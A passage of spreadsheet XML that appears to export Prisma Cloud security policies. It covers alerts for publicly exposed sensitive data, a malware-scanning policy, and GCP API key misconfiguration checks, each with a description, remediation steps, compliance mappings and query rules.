        <is>
          <t>data</t>
        </is>
      </c>
      <c r="W2660" t="inlineStr">
        <is>
          <t>Testing Credit and PII detection</t>
        </is>
      </c>
      <c r="X2660" t="inlineStr"/>
      <c r="Y2660" t="inlineStr"/>
      <c r="Z2660" t="inlineStr"/>
      <c r="AA2660" t="inlineStr">
        <is>
          <t>Marius Banica</t>
        </is>
      </c>
      <c r="AB2660" t="inlineStr">
        <is>
          <t>2024-09-13 16:51:18</t>
        </is>
      </c>
      <c r="AC2660" t="inlineStr"/>
      <c r="AD2660" t="b">
        <v>0</v>
      </c>
      <c r="AE2660" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF2660" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG26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0" t="inlineStr">
        <is>
          <t>62b51553-2324-4169-b190-f7dd355a7cb1</t>
        </is>
      </c>
      <c r="AI2660" t="inlineStr"/>
      <c r="AJ2660" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK2660" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2661">
      <c r="A2661" t="inlineStr"/>
      <c r="B2661" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2661" s="2" t="inlineStr"/>
      <c r="D2661" t="inlineStr"/>
      <c r="E2661" t="inlineStr"/>
      <c r="F2661" t="inlineStr"/>
      <c r="G2661" t="b">
        <v>1</v>
      </c>
      <c r="H26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1" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J2661" t="inlineStr">
        <is>
          <t>data_classification_data</t>
        </is>
      </c>
      <c r="K2661" t="inlineStr">
        <is>
          <t>Objects containing Financial Information publicly exposed</t>
        </is>
      </c>
      <c r="L2661" t="inlineStr"/>
      <c r="M2661" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N2661" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2661" t="inlineStr">
        <is>
          <t>data</t>
        </is>
      </c>
      <c r="P2661" t="inlineStr">
        <is>
          <t>data_classification</t>
        </is>
      </c>
      <c r="Q2661" t="inlineStr"/>
      <c r="R2661" t="inlineStr"/>
      <c r="S2661" t="inlineStr"/>
      <c r="T2661" t="b">
        <v>0</v>
      </c>
      <c r="U2661" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2661" t="inlineStr">
        <is>
          <t>data</t>
        </is>
      </c>
      <c r="W2661" t="inlineStr">
        <is>
          <t>This policy creates alerts if Financial data is publicly exposed.</t>
        </is>
      </c>
      <c r="X2661" t="inlineStr">
        <is>
          <t>Change the object ACL to only accessible by owner</t>
        </is>
      </c>
      <c r="Y2661" t="inlineStr"/>
      <c r="Z2661" t="inlineStr"/>
      <c r="AA2661" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2661" t="inlineStr">
        <is>
          <t>2023-10-27 06:11:59</t>
        </is>
      </c>
      <c r="AC2661" t="inlineStr"/>
      <c r="AD2661" t="b">
        <v>1</v>
      </c>
      <c r="AE2661" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2661" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG26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1" t="inlineStr">
        <is>
          <t>0849ba8b-db19-4bb8-9be0-9c0112f529c5</t>
        </is>
      </c>
      <c r="AI2661" t="inlineStr"/>
      <c r="AJ2661" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK2661" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2662">
      <c r="A2662" t="inlineStr"/>
      <c r="B2662" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2662" s="2" t="inlineStr"/>
      <c r="D2662" t="inlineStr"/>
      <c r="E2662" t="inlineStr"/>
      <c r="F2662" t="inlineStr"/>
      <c r="G2662" t="b">
        <v>1</v>
      </c>
      <c r="H26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2" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J2662" t="inlineStr">
        <is>
          <t>data_classification_data</t>
        </is>
      </c>
      <c r="K2662" t="inlineStr">
        <is>
          <t>Storage Asset with sensitive data found</t>
        </is>
      </c>
      <c r="L2662" t="inlineStr">
        <is>
          <t>DISCOVERY</t>
        </is>
      </c>
      <c r="M2662" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N2662" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2662" t="inlineStr">
        <is>
          <t>data</t>
        </is>
      </c>
      <c r="P2662" t="inlineStr">
        <is>
          <t>data_classification</t>
        </is>
      </c>
      <c r="Q2662" t="inlineStr"/>
      <c r="R2662" t="inlineStr"/>
      <c r="S2662" t="inlineStr">
        <is>
          <t>Sensitive Resource,Attack Path Rule</t>
        </is>
      </c>
      <c r="T2662" t="b">
        <v>0</v>
      </c>
      <c r="U2662" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2662" t="inlineStr">
        <is>
          <t>data</t>
        </is>
      </c>
      <c r="W2662" t="inlineStr">
        <is>
          <t>This policy creates an alert if the asset contains objects with sensitive information.</t>
        </is>
      </c>
      <c r="X2662" t="inlineStr">
        <is>
          <t>1. Make sure the resource is not exposed to public. 2. Delete or move the sensitive data if it is mistakenly place</t>
        </is>
      </c>
      <c r="Y2662" t="inlineStr"/>
      <c r="Z2662" t="inlineStr"/>
      <c r="AA2662" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2662" t="inlineStr">
        <is>
          <t>2023-09-15 06:33:26</t>
        </is>
      </c>
      <c r="AC2662" t="inlineStr"/>
      <c r="AD2662" t="b">
        <v>1</v>
      </c>
      <c r="AE2662" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2662" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG26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2" t="inlineStr">
        <is>
          <t>0885fd1e-054a-49fc-8364-7146d54d4d40</t>
        </is>
      </c>
      <c r="AI2662" t="inlineStr"/>
      <c r="AJ2662" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK2662" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2663">
      <c r="A2663" t="inlineStr"/>
      <c r="B2663" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2663" s="2" t="inlineStr"/>
      <c r="D2663" t="inlineStr"/>
      <c r="E2663" t="inlineStr"/>
      <c r="F2663" t="inlineStr"/>
      <c r="G2663" t="b">
        <v>1</v>
      </c>
      <c r="H26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3" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J2663" t="inlineStr">
        <is>
          <t>data_classification_data</t>
        </is>
      </c>
      <c r="K2663" t="inlineStr">
        <is>
          <t>Objects containing Healthcare information publicly exposed</t>
        </is>
      </c>
      <c r="L2663" t="inlineStr"/>
      <c r="M2663" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N2663" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2663" t="inlineStr">
        <is>
          <t>data</t>
        </is>
      </c>
      <c r="P2663" t="inlineStr">
        <is>
          <t>data_classification</t>
        </is>
      </c>
      <c r="Q2663" t="inlineStr"/>
      <c r="R2663" t="inlineStr"/>
      <c r="S2663" t="inlineStr"/>
      <c r="T2663" t="b">
        <v>0</v>
      </c>
      <c r="U2663" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2663" t="inlineStr">
        <is>
          <t>data</t>
        </is>
      </c>
      <c r="W2663" t="inlineStr">
        <is>
          <t>This policy detects objects containing healthcare related information that are publicly exposed.</t>
        </is>
      </c>
      <c r="X2663" t="inlineStr">
        <is>
          <t>Change the object ACL to only accessible by owner</t>
        </is>
      </c>
      <c r="Y2663" t="inlineStr"/>
      <c r="Z2663" t="inlineStr"/>
      <c r="AA2663" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2663" t="inlineStr">
        <is>
          <t>2021-10-26 17:48:29</t>
        </is>
      </c>
      <c r="AC2663" t="inlineStr"/>
      <c r="AD2663" t="b">
        <v>1</v>
      </c>
      <c r="AE2663" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2663" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG26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3" t="inlineStr">
        <is>
          <t>b5169dd8-77b3-4ffa-ab0c-5277cdc79e44</t>
        </is>
      </c>
      <c r="AI2663" t="inlineStr"/>
      <c r="AJ2663" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK2663" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2664">
      <c r="A2664" t="inlineStr"/>
      <c r="B2664" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2664" s="2" t="inlineStr"/>
      <c r="D2664" t="inlineStr"/>
      <c r="E2664" t="inlineStr"/>
      <c r="F2664" t="inlineStr"/>
      <c r="G2664" t="b">
        <v>1</v>
      </c>
      <c r="H26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4" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J2664" t="inlineStr">
        <is>
          <t>data_classification_data</t>
        </is>
      </c>
      <c r="K2664" t="inlineStr">
        <is>
          <t>Objects containing PII data publicly exposed</t>
        </is>
      </c>
      <c r="L2664" t="inlineStr"/>
      <c r="M2664" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N2664" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2664" t="inlineStr">
        <is>
          <t>data</t>
        </is>
      </c>
      <c r="P2664" t="inlineStr">
        <is>
          <t>data_classification</t>
        </is>
      </c>
      <c r="Q2664" t="inlineStr"/>
      <c r="R2664" t="inlineStr"/>
      <c r="S2664" t="inlineStr"/>
      <c r="T2664" t="b">
        <v>0</v>
      </c>
      <c r="U2664" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2664" t="inlineStr">
        <is>
          <t>data</t>
        </is>
      </c>
      <c r="W2664" t="inlineStr">
        <is>
          <t>This policy creates alerts if PII data is publicly exposed.</t>
        </is>
      </c>
      <c r="X2664" t="inlineStr">
        <is>
          <t>Change the object ACL to only accessible by owner</t>
        </is>
      </c>
      <c r="Y2664" t="inlineStr"/>
      <c r="Z2664" t="inlineStr"/>
      <c r="AA2664" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2664" t="inlineStr">
        <is>
          <t>2021-10-26 17:48:29</t>
        </is>
      </c>
      <c r="AC2664" t="inlineStr"/>
      <c r="AD2664" t="b">
        <v>1</v>
      </c>
      <c r="AE2664" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2664" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG26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4" t="inlineStr">
        <is>
          <t>5c73b4e2-72b4-4ef7-a26b-b0c52883e9cb</t>
        </is>
      </c>
      <c r="AI2664" t="inlineStr"/>
      <c r="AJ2664" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK2664" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2665">
      <c r="A2665" t="inlineStr"/>
      <c r="B2665" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2665" s="2" t="inlineStr"/>
      <c r="D2665" t="inlineStr"/>
      <c r="E2665" t="inlineStr"/>
      <c r="F2665" t="inlineStr"/>
      <c r="G2665" t="b">
        <v>1</v>
      </c>
      <c r="H26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5" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J2665" t="inlineStr">
        <is>
          <t>data_classification_data</t>
        </is>
      </c>
      <c r="K2665" t="inlineStr">
        <is>
          <t>Objects containing Intellectual Property publicly exposed</t>
        </is>
      </c>
      <c r="L2665" t="inlineStr"/>
      <c r="M2665" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N2665" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2665" t="inlineStr">
        <is>
          <t>data</t>
        </is>
      </c>
      <c r="P2665" t="inlineStr">
        <is>
          <t>data_classification</t>
        </is>
      </c>
      <c r="Q2665" t="inlineStr"/>
      <c r="R2665" t="inlineStr"/>
      <c r="S2665" t="inlineStr"/>
      <c r="T2665" t="b">
        <v>0</v>
      </c>
      <c r="U2665" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2665" t="inlineStr">
        <is>
          <t>data</t>
        </is>
      </c>
      <c r="W2665" t="inlineStr">
        <is>
          <t>This policy creates alerts if objects containing Intellectual Property is publicly exposed.</t>
        </is>
      </c>
      <c r="X2665" t="inlineStr">
        <is>
          <t>Change the object ACL to only accessible by owner</t>
        </is>
      </c>
      <c r="Y2665" t="inlineStr"/>
      <c r="Z2665" t="inlineStr"/>
      <c r="AA2665" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2665" t="inlineStr">
        <is>
          <t>2021-10-26 17:48:29</t>
        </is>
      </c>
      <c r="AC2665" t="inlineStr"/>
      <c r="AD2665" t="b">
        <v>1</v>
      </c>
      <c r="AE2665" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2665" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG26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5" t="inlineStr">
        <is>
          <t>9c482d8c-8cc5-4247-8e20-57d5cdf516a3</t>
        </is>
      </c>
      <c r="AI2665" t="inlineStr"/>
      <c r="AJ2665" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK2665" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2666">
      <c r="A2666" t="inlineStr"/>
      <c r="B2666" s="2" t="inlineStr">
        <is>
          <t>REVIEW</t>
        </is>
      </c>
      <c r="C2666" s="2" t="inlineStr"/>
      <c r="D2666" t="n">
        <v>2</v>
      </c>
      <c r="E2666" t="n">
        <v>12</v>
      </c>
      <c r="F2666" t="n">
        <v>2</v>
      </c>
      <c r="G2666" t="b">
        <v>1</v>
      </c>
      <c r="H26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6" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J2666" t="inlineStr">
        <is>
          <t>malware_data</t>
        </is>
      </c>
      <c r="K2666" t="inlineStr">
        <is>
          <t>Objects containing Malware</t>
        </is>
      </c>
      <c r="L2666" t="inlineStr"/>
      <c r="M2666" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N2666" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2666" t="inlineStr">
        <is>
          <t>data</t>
        </is>
      </c>
      <c r="P2666" t="inlineStr">
        <is>
          <t>malware</t>
        </is>
      </c>
      <c r="Q2666" t="inlineStr"/>
      <c r="R2666" t="inlineStr"/>
      <c r="S2666" t="inlineStr"/>
      <c r="T2666" t="b">
        <v>0</v>
      </c>
      <c r="U2666" t="inlineStr">
        <is>
          <t>vulnerabilities</t>
        </is>
      </c>
      <c r="V2666" t="inlineStr">
        <is>
          <t>data</t>
        </is>
      </c>
      <c r="W2666" t="inlineStr">
        <is>
          <t>This policy scans for objects containing Malware using Wildfire as a Service.</t>
        </is>
      </c>
      <c r="X2666" t="inlineStr">
        <is>
          <t>Delete the file</t>
        </is>
      </c>
      <c r="Y2666" t="inlineStr"/>
      <c r="Z2666" t="inlineStr"/>
      <c r="AA2666" t="inlineStr">
        <is>
          <t>Bliss Jourdan</t>
        </is>
      </c>
      <c r="AB2666" t="inlineStr">
        <is>
          <t>2023-01-12 21:43:48</t>
        </is>
      </c>
      <c r="AC2666" t="inlineStr"/>
      <c r="AD2666" t="b">
        <v>1</v>
      </c>
      <c r="AE2666" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2666" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG26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6" t="inlineStr">
        <is>
          <t>003582e3-a444-45d2-a873-68e7c62a712c</t>
        </is>
      </c>
      <c r="AI2666" t="inlineStr"/>
      <c r="AJ2666" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK2666" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2667">
      <c r="A2667" t="inlineStr">
        <is>
          <t>ISO/IEC 27001:2022, Secure Controls Framework (SCF) - 2024.2, Australian Cyber Security Centre (ACSC) Essential Eight - Level 2, RBI Baseline Cyber Security and Resilience Requirements, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), CIS Controls v8.1, ISO 27002:2022, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), CRI Profile v2.0, ISO/IEC 27001:2022, ISO 27002:2022, ISO 27002:2022, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), HITRUST CSF v.11.2.0, ACSC Information Security Manual (ISM), Secure Controls Framework (SCF) - 2022.2.1, Australian Cyber Security Centre (ACSC) Essential Eight - Level 3, New Zealand Information Security Manual (NZISM v3.4), kashan ACSC Information Security Manual (ISM), Australian Cyber Security Centre (ACSC) Essential Eight - Level 1, SOC 2, Sarbanes Oxley Act (SOX), PCI DSS v4.0, DORA, Sarbanes Oxley Act (SOX), Risk Management in Technology (RMiT), NIST CSF v2.0, Microsoft Cloud Security Benchmark v1, CIS Controls v8, MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, SOC 2, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), CRI Profile v2.0, ISO/IEC 27001:2022, Secure Controls Framework (SCF) - 2024.2, CIS v3.0.0 (GCP) Level 2, MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, TX-RAMP Level 1, NIST CSF v2.0, SOC 2, ISO 27002:2022, Copy of CIS Controls v8, Copy of ACSC Information Security Manual (ISM)-clone, CIS v2.0.0 (GCP) Level 2, kfirdaus AWS Account-CS, CIS Controls v7.1, ISO/IEC 27001:2022, MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, Microsoft Cloud Security Benchmark v1, Copy of New Zealand Information Security Manual (NZISM v3.4)</t>
        </is>
      </c>
      <c r="B2667" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2667" s="2" t="inlineStr"/>
      <c r="D2667" t="inlineStr"/>
      <c r="E2667" t="inlineStr"/>
      <c r="F2667" t="inlineStr"/>
      <c r="G2667" t="b">
        <v>0</v>
      </c>
      <c r="H26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7" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2667" t="inlineStr">
        <is>
          <t>gcloud-api-key</t>
        </is>
      </c>
      <c r="K2667" t="inlineStr">
        <is>
          <t>GCP API key not restricted to use by specified Hosts and Apps</t>
        </is>
      </c>
      <c r="L2667" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2667" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2667" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2667" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2667" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2667" t="inlineStr">
        <is>
          <t>10</t>
        </is>
      </c>
      <c r="R2667" t="inlineStr">
        <is>
          <t>10.8</t>
        </is>
      </c>
      <c r="S2667" t="inlineStr"/>
      <c r="T2667" t="b">
        <v>0</v>
      </c>
      <c r="U2667" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2667" t="inlineStr">
        <is>
          <t>gcloud-api-key</t>
        </is>
      </c>
      <c r="W2667" t="inlineStr">
        <is>
          <t>This policy identifies GCP API key not restricted to use by specified Hosts and Apps. Unrestricted keys are insecure because they can be viewed publicly, such as from within a browser, or they can be accessed on a device where the key resides. It is recommended to restrict API key usage to trusted hosts, HTTP referrers and apps.</t>
        </is>
      </c>
      <c r="X2667" t="inlineStr">
        <is>
          <t>1. Log in to google cloud console
2. Navigate to 'Credentials', Under service 'APIs &amp; Services' (Left Panel)
3. In the section 'API Keys', Click on the reported 'API Key Name'
4. In the 'Key restrictions' section, set the application restrictions to any of HTTP referrers, IP Adresses, Android Apps, iOS Apps.
5. Click 'SAVE'.
Note: Do not set 'HTTP referrers' to wild-cards (* or *.[TLD] or *.[TLD]/*). 
Do not set 'IP addresses' restriction to any overly permissive IP (0.0.0.0 or 0.0.0.0/0 or ::0 or ::/0)</t>
        </is>
      </c>
      <c r="Y2667" t="inlineStr"/>
      <c r="Z2667" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'gcp' AND api.name = 'gcloud-api-key' AND json.rule = (restrictions.browserKeyRestrictions does not exist and restrictions.serverKeyRestrictions does not exist and restrictions.androidKeyRestrictions does not exist and restrictions.iosKeyRestrictions does not exist) or (restrictions.browserKeyRestrictions exists and (restrictions.browserKeyRestrictions[?any(allowedReferrers[*] equals "*")] exists or restrictions.browserKeyRestrictions[?any(allowedReferrers[*] equals "*.[TLD]")] exists or restrictions.browserKeyRestrictions[?any(allowedReferrers[*] equals "*.[TLD]/*")] exists)) or (restrictions.serverKeyRestrictions exists and (restrictions.serverKeyRestrictions[?any(allowedIps[*] equals 0.0.0.0)] exists or restrictions.serverKeyRestrictions[?any(allowedIps[*] equals 0.0.0.0/0)] exists or restrictions.serverKeyRestrictions[?any(allowedIps[*] equals ::/0)] exists  or restrictions.serverKeyRestrictions[?any(allowedIps[*] equals ::0)] exists))</t>
        </is>
      </c>
      <c r="AA2667" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2667" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2667" t="inlineStr">
        <is>
          <t>PC-GCP-API-841</t>
        </is>
      </c>
      <c r="AD2667" t="b">
        <v>1</v>
      </c>
      <c r="AE2667" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2667" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG26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7" t="inlineStr">
        <is>
          <t>5643cf87-d483-4102-a70e-f57a21a1ccbe</t>
        </is>
      </c>
      <c r="AI2667" t="inlineStr">
        <is>
          <t>27bc4454-b07c-40be-8609-b696c349d0c8</t>
        </is>
      </c>
      <c r="AJ2667" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2667" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2668">
      <c r="A2668" t="inlineStr">
        <is>
          <t>HITRUST CSF v.11.2.0, Secure Controls Framework (SCF) - 2024.2, Secure Controls Framework (SCF) - 2024.2, kashan ACSC Information Security Manual (ISM), New Zealand Information Security Manual (NZISM v3.4), Copy of ACSC Information Security Manual (ISM)-clone, kfirdaus AWS Account-CS, TX-RAMP Level 1, CIS v2.0.0 (GCP) Level 2, TX-RAMP Level 2, CIS Controls v8.1, PCI DSS v4.0, RBI Baseline Cyber Security and Resilience Requirements, Insurance Regulatory And Development Authority Of India, CIS Controls v7.1, CIS v3.0.0 (GCP) Level 2, DORA, ACSC Information Security Manual (ISM), TX-RAMP Level 2, CIS Controls v8, Australian Cyber Security Centre (ACSC) Essential Eight - Level 3, TX-RAMP Level 1, Australian Cyber Security Centre (ACSC) Essential Eight - Level 2, Copy of New Zealand Information Security Manual (NZISM v3.4), HITRUST CSF v.11.2.0, SOC 2, Secure Controls Framework (SCF) - 2022.2.1, CSA CCM v.4.0.6, ITSG-33, Copy of CIS Controls v8, CSA CCM v4.0.12, ITSG-33, Sarbanes Oxley Act (SOX), CIS v1.3.0 (GCP), Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2)</t>
        </is>
      </c>
      <c r="B2668" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2668" s="2" t="inlineStr"/>
      <c r="D2668" t="inlineStr"/>
      <c r="E2668" t="inlineStr"/>
      <c r="F2668" t="inlineStr"/>
      <c r="G2668" t="b">
        <v>0</v>
      </c>
      <c r="H26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8" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2668" t="inlineStr">
        <is>
          <t>gcloud-api-key</t>
        </is>
      </c>
      <c r="K2668" t="inlineStr">
        <is>
          <t>GCP API key not rotating in every 90 days</t>
        </is>
      </c>
      <c r="L2668" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2668" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2668" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2668" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2668" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2668" t="inlineStr">
        <is>
          <t>CIS Control 5</t>
        </is>
      </c>
      <c r="R2668" t="inlineStr">
        <is>
          <t>5.3</t>
        </is>
      </c>
      <c r="S2668" t="inlineStr"/>
      <c r="T2668" t="b">
        <v>0</v>
      </c>
      <c r="U2668" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2668" t="inlineStr">
        <is>
          <t>gcloud-api-key</t>
        </is>
      </c>
      <c r="W2668" t="inlineStr">
        <is>
          <t>This policy identifies GCP API keys for which the creation date is aged more than 90 days. Google recommends using the standard authentication flow instead of API Keys. However, there are limited cases where API keys are more appropriate. API keys should be rotated to ensure that data cannot be accessed with an old key that might have been lost, cracked, or stolen.</t>
        </is>
      </c>
      <c r="X2668" t="inlineStr">
        <is>
          <t>1. Log in to google cloud console
2. Navigate to 'Credentials', Under service 'APIs &amp; Services'
3. In the section 'API Keys', Click on the reported 'API Key Name'
4. Click on 'REGENERATE KEY' to rotate the API key
5. On the pop-up window click on 'REPLACE KEY'
6. Validate the Creation date once it is updated.</t>
        </is>
      </c>
      <c r="Y2668" t="inlineStr"/>
      <c r="Z2668" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'gcp' AND api.name = 'gcloud-api-key' AND json.rule = "_DateTime.ageInDays(createTime) &gt; 90"</t>
        </is>
      </c>
      <c r="AA2668" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2668" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2668" t="inlineStr">
        <is>
          <t>PC-GCP-API-843</t>
        </is>
      </c>
      <c r="AD2668" t="b">
        <v>1</v>
      </c>
      <c r="AE2668" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2668" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG26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8" t="inlineStr">
        <is>
          <t>83fb7b2f-e008-469e-85c7-3f0410860839</t>
        </is>
      </c>
      <c r="AI2668" t="inlineStr">
        <is>
          <t>a8fa0dd6-08b7-400a-b98d-336c97c0815e</t>
        </is>
      </c>
      <c r="AJ2668" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2668" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2669">
      <c r="A2669" t="inlineStr">
        <is>
          <t>Secure Controls Framework (SCF) - 2024.2, CIS v2.0.0 (GCP) Level 2, Microsoft Cloud Security Benchmark v1, CIS v3.0.0 (GCP) Level 2, Risk Management in Technology (RMiT), SOC 2, MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, Microsoft Cloud Security Benchmark v1</t>
        </is>
      </c>
      <c r="B2669" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2669" s="2" t="inlineStr"/>
      <c r="D2669" t="inlineStr"/>
      <c r="E2669" t="inlineStr"/>
      <c r="F2669" t="inlineStr"/>
      <c r="G2669" t="b">
        <v>1</v>
      </c>
      <c r="H2669"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Tuan's Alert Rule,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69" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2669" t="inlineStr">
        <is>
          <t>gcloud-api-key</t>
        </is>
      </c>
      <c r="K2669" t="inlineStr">
        <is>
          <t>GCP API key is created for a project</t>
        </is>
      </c>
      <c r="L2669" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2669" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N2669" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2669" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2669" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2669" t="inlineStr">
        <is>
          <t>NS</t>
        </is>
      </c>
      <c r="R2669" t="inlineStr">
